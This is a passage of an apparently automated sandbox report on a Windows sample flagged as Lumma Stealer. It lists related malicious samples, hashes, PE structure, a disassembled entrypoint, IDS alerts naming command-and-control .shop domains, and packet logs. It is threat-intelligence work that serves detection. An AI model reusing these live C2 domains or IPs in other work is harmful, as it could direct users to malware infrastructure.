172.67.174.127	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
104.21.84.50	qbvytVOPN0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	qbvytVOPN0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	3YnUgeDEZz.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	N#U0435wInst.exe	Get hash	malicious	LummaC	Browse
	Loader.exe	Get hash	malicious	LummaC	Browse
	FusionLoader v2.1.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.10777.11381.exe	Get hash	malicious	LummaC	Browse
	d3d9x.dll	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
interactiedovspm.shop	qbvytVOPN0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.161.217
	qbvytVOPN0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.42.119
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.42.119
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.161.217
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.161.217
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.42.119
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.161.217
	SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exe	Get hash	malicious	LummaC	Browse	172.67.161.217
	Main.exe	Get hash	malicious	LummaC	Browse	172.67.161.217
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	172.67.161.217
charecteristicdxp.shop	qbvytVOPN0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.50
	qbvytVOPN0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.50
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.186.145
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.186.145
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.84.50
	SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exe	Get hash	malicious	LummaC	Browse	172.67.186.145
	Main.exe	Get hash	malicious	LummaC	Browse	172.67.186.145
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	172.67.186.145
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.186.145
	SecuriteInfo.com.Win64.Malware-gen.14072.1224.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse	172.67.186.145
drinnkysoapmzv.shop	H3uiFkizhO.exe	Get hash	malicious	LummaC	Browse	104.21.40.15
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.174.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.40.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	snake.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	snake.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	172.67.157.127
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	4.7.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	172.64.41.3
	stub.exe	Get hash	malicious	Stealerium	Browse	162.159.136.232
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	104.30.194.47
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
CLOUDFLARENETUS	snake.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	snake.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	172.67.157.127
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	4.7.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	172.64.41.3
	stub.exe	Get hash	malicious	Stealerium	Browse	162.159.136.232
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	104.30.194.47
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
CLOUDFLARENETUS	snake.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	snake.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	172.67.157.127
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	4.7.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	172.64.41.3
	stub.exe	Get hash	malicious	Stealerium	Browse	162.159.136.232
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	104.30.194.47
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	172.67.161.217 172.67.174.127 104.21.84.50
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	172.67.161.217 172.67.174.127 104.21.84.50
	^=L@test_PC_FilE_2024_as_P@ssKey=^.zip	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.161.217 172.67.174.127 104.21.84.50
	http://www.yahool.ru/	Get hash	malicious	Unknown	Browse	172.67.161.217 172.67.174.127 104.21.84.50
	KbUI.exe	Get hash	malicious	Remcos, PureLog Stealer, XRed	Browse	172.67.161.217 172.67.174.127 104.21.84.50
	Launcher_x32_x64.exe	Get hash	malicious	LummaC	Browse	172.67.161.217 172.67.174.127 104.21.84.50
	l5u4ezxr.u51.exe	Get hash	malicious	LummaC	Browse	172.67.161.217 172.67.174.127 104.21.84.50
	Order enquiry.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.161.217 172.67.174.127 104.21.84.50
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	172.67.161.217 172.67.174.127 104.21.84.50
	BankPaymAdviceVend.Report.docx	Get hash	malicious	Unknown	Browse	172.67.161.217 172.67.174.127 104.21.84.50

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.411909955160431
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe
File size:	5'181'952 bytes
MD5:	4b85d1518b4edc2239da008e3a91a323
SHA1:	bf33b8db7b6a40aff7f8a171e6d6169b2dac73fb
SHA256:	3266bf53273feea7374264865066f706462ea323d8c26cba051cfcbefc1fcb80
SHA512:	4b1c480341d42b8a7c78022dbb47ec3a5e1fc3b5852c2a04afd9713cb459217857efb377683e84231a52c13dba405eb4de49ec11ac5eee60a8175c40254281a4
SSDEEP:	49152:0GxYkG5bhNgDjTkxPpq89ZyQo+3rk8nT2X0m/EbwNjPXAjb5Et/VMW/TJxFPRcKd:DBGFIDOrzT2ke6EK1GdCLuF
TLSH:	C1365A17FC9144E4C0AAD63589669262BB717C884B3123D72BA0F7783F76BD09EB9704
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..!...O................@.............................`U.......O...`... ............................

File Icon


Icon Hash:	3b6120282c4c5a1f

Static PE Info

General

Entrypoint:	0x1400014c0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x40205c80, 0x1, 0x40205c50, 0x1, 0x402096e0, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	5929190c8765f5bc37b052ab5c6c53e7

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [004C0E95h]
mov dword ptr [eax], 00000001h
call 00007F9480BF345Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [004C0E75h]
mov dword ptr [eax], 00000000h
call 00007F9480BF343Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F9480E02CECh
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F9480BF3779h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp dword ptr [eax]
inc edi
outsd
and byte ptr [edx+75h], ah
imul ebp, dword ptr [esp+20h], 203A4449h
and bh, byte ptr [eax]
jp 00007F9480BF3816h
xor eax, 375A7252h
arpl word ptr [edx+46h], ax
dec eax
cmp dword ptr [59666631h], ebp
inc ebx
das
xor byte ptr [eax+edx*2+4Ah], cl
insb
sub eax, 30734171h
dec ebx
cmp byte ptr [edx+5Ah], ah
jp 00007F9480BF37CFh
push edx
pop eax
jnc 00007F9480BF37EFh
das
insb
xor al, 4Bh
dec ebx
push edx
je 00007F9480BF3801h
pop eax
xor al, byte ptr [bp+si+35h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x52e000	0x4e	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x52f000	0x13d0	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x533000	0x1622c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4c3000	0xc3b4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54a000	0xb3e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4c1cc0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x52f47c	0x440	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x210210	0x210400	bb5fe9423157901b18e2e7eb3d6ce157	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x212000	0x479b0	0x47a00	b61cbabd284ffff9acdcc232c9d08113	False	0.3685032177137871	dBase III DBT, version number 0, next free block index 10, 1st item "srzf/mmap-go\011v1.1.0\011h1:6EUwBLQ/Mcr1EYLE4Tn1VdW1A4ckqCQWZBw8Hr0kjpQ="	4.84488815044577	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x25a000	0x268af0	0x268c00	fda8081abd1ab444e9ae650d20a07365	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata	0x4c3000	0xc3b4	0xc400	ebc11550f6f9859645674ba514ae5595	False	0.413883131377551	data	5.325395904627555	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x4d0000	0xc44	0xe00	2ec2e7abdb66543b55329a9e289481c2	False	0.255859375	data	3.9718680310051004	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x4d1000	0x5c1e0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x52e000	0x4e	0x200	25d699804405f742b2482494523f0cbe	False	0.1328125	data	0.8426867641107897	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata	0x52f000	0x13d0	0x1400	f46b1a24a52c06a54baf2e659fcc3f7f	False	0.3171875	data	4.501574548304137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x531000	0x70	0x200	cde25638e6cb80b28c417ec815827297	False	0.08203125	data	0.47139462148086453	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x532000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x533000	0x1622c	0x16400	8f3b7a476cb6a3fbbaffc09b52ffe0c1	False	0.8459445224719101	data	7.413049312495645	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x54a000	0xb3e0	0xb400	52000a4ca772a780e5d020d3f68e324d	False	0.2766059027777778	data	5.422986835090234	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5332f4	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.325
RT_ICON	0x53395c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.4166666666666667
RT_ICON	0x533c44	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5777027027027027
RT_ICON	0x533d6c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.6226012793176973
RT_ICON	0x534c14	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.7369133574007221
RT_ICON	0x5354bc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.5476878612716763
RT_ICON	0x535a24	0xf199	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9981082960112532
RT_ICON	0x544bc0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5300829875518672
RT_ICON	0x547168	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6137429643527205
RT_ICON	0x548210	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.19680851063829788
RT_GROUP_ICON	0x548678	0x92	data	English	United States	0.6438356164383562
RT_VERSION	0x54870c	0x4f4	data	English	United States	0.2870662460567823
RT_MANIFEST	0x548c00	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL

Import

KERNEL32.dll

AddAtomA, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler

msvcrt.dll

___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen

Exports

Name	Ordinal	Address
_cgo_dummy_export	1	0x14052c410

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-01T22:24:56.391637+0200	TCP	2055364	ET MALWARE Lumma Stealer Domain in TLS SNI (drinnkysoapmzv .shop)	1	49712	443	192.168.2.5	172.67.174.127
2024-09-01T22:24:57.968819+0200	UDP	2055293	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop)	1	49572	53	192.168.2.5	1.1.1.1
2024-09-01T22:24:58.453576+0200	TCP	2055294	ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI)	1	49714	443	192.168.2.5	104.21.84.50
2024-09-01T22:24:57.051523+0200	UDP	2055299	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop)	1	56479	53	192.168.2.5	1.1.1.1
2024-09-01T22:24:56.961672+0200	UDP	2055301	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop)	1	52293	53	192.168.2.5	1.1.1.1
2024-09-01T22:24:59.472042+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49715	443	192.168.2.5	104.21.84.50
2024-09-01T22:24:59.472042+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49715	443	192.168.2.5	104.21.84.50
2024-09-01T22:24:56.943733+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49712	443	192.168.2.5	172.67.174.127
2024-09-01T22:24:56.943733+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49712	443	192.168.2.5	172.67.174.127
2024-09-01T22:24:57.531011+0200	TCP	2055300	ET MALWARE Observed Lumma Stealer Related Domain (interactiedovspm .shop in TLS SNI)	1	49713	443	192.168.2.5	172.67.161.217
2024-09-01T22:24:58.569408+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49714	443	192.168.2.5	104.21.84.50
2024-09-01T22:24:58.569408+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49714	443	192.168.2.5	104.21.84.50
2024-09-01T22:24:55.906452+0200	UDP	2055361	ET MALWARE Lumma Stealer Domain in DNS Lookup (drinnkysoapmzv .shop)	1	58033	53	192.168.2.5	1.1.1.1
2024-09-01T22:24:59.022856+0200	TCP	2055294	ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI)	1	49715	443	192.168.2.5	104.21.84.50
2024-09-01T22:24:57.950673+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49713	443	192.168.2.5	172.67.161.217
2024-09-01T22:24:57.950673+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49713	443	192.168.2.5	172.67.161.217

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 22:24:55.926958084 CEST	49712	443	192.168.2.5	172.67.174.127
Sep 1, 2024 22:24:55.927002907 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:55.927072048 CEST	49712	443	192.168.2.5	172.67.174.127
Sep 1, 2024 22:24:55.928177118 CEST	49712	443	192.168.2.5	172.67.174.127
Sep 1, 2024 22:24:55.928189993 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:56.391565084 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:56.391637087 CEST	49712	443	192.168.2.5	172.67.174.127
Sep 1, 2024 22:24:56.393259048 CEST	49712	443	192.168.2.5	172.67.174.127
Sep 1, 2024 22:24:56.393266916 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:56.393492937 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:56.435240984 CEST	49712	443	192.168.2.5	172.67.174.127
Sep 1, 2024 22:24:56.435262918 CEST	49712	443	192.168.2.5	172.67.174.127
Sep 1, 2024 22:24:56.435317993 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:56.943732023 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:56.943809986 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:56.943944931 CEST	49712	443	192.168.2.5	172.67.174.127
Sep 1, 2024 22:24:56.945568085 CEST	49712	443	192.168.2.5	172.67.174.127
Sep 1, 2024 22:24:56.945585012 CEST	443	49712	172.67.174.127	192.168.2.5
Sep 1, 2024 22:24:56.945595026 CEST	49712	443	192.168.2.5	172.67.174.127
